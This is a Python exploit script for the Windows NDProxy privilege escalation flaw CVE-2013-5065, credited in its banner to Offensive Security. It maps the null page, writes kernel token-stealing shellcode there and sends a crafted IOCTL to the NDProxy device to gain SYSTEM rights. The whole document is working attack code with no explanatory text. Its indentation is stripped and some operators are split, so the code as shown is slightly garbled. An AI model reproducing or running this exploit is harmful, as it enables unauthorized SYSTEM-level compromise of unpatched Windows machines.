from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = 2097151
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
baseadd = c_int( 0x00000001 )
MEMRES = ( 0x1000 | 0x2000 )
MEM_DECOMMIT = 0x4000
PAGEEXE = 0x00000040
null_size = c_int( 0x1000 )
STATUS_SUCCESS = 0
def log(msg):
print msg
def getLastError():
buf = create_string_buffer( 2048 )
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0 ,
buf, sizeof(buf), NULL):
log(buf.value)
else :
log( "[-] Unknown Error" )
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"
tmp = ( "\x00" * 4 ) * 5 + "\x25\x01\x03\x07" + "\x00" * 4 + "\x34\x00\x00\x00" + "\x00" * ( 84 - 24 )
InBuf = c_char_p(tmp)
dwStatus = ntdll.NtAllocateVirtualMemory( 0xFFFFFFFF , byref(baseadd), 0x0 , byref(null_size), MEMRES, PAGEEXE)
if dwStatus ! = STATUS_SUCCESS:
print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
getLastError()
written = c_ulong()
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc = "\x90" * 0x38 + "\x3c\x00\x00\x00" + "\x90" * 4 + sh + "\xcc" * ( 0x400 - 0x3c - 4 - len (sh))
alloc = kernel32.WriteProcessMemory( 0xFFFFFFFF , 0x00000001 , sc, 0x400 , byref(written))
if alloc = = 0 :
print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
getLastError()
dwRetBytes = DWORD( 0 )
DEVICE_NAME = "\\\\.\\NDProxy"
hdev = kernel32.CreateFileA(DEVICE_NAME, 0 , 0 , None , OPEN_EXISTING , 0 , None )
if hdev = = - 1 :
print "[-] Couldn't open the device... :("
sys.exit()
kernel32.DeviceIoControl(hdev, 0x8fff23cc , InBuf, 0x54 , InBuf, 0x24 , byref(dwRetBytes), 0 )
kernel32.CloseHandle(hdev)
print "[+] Spawning SYSTEM Shell..."
|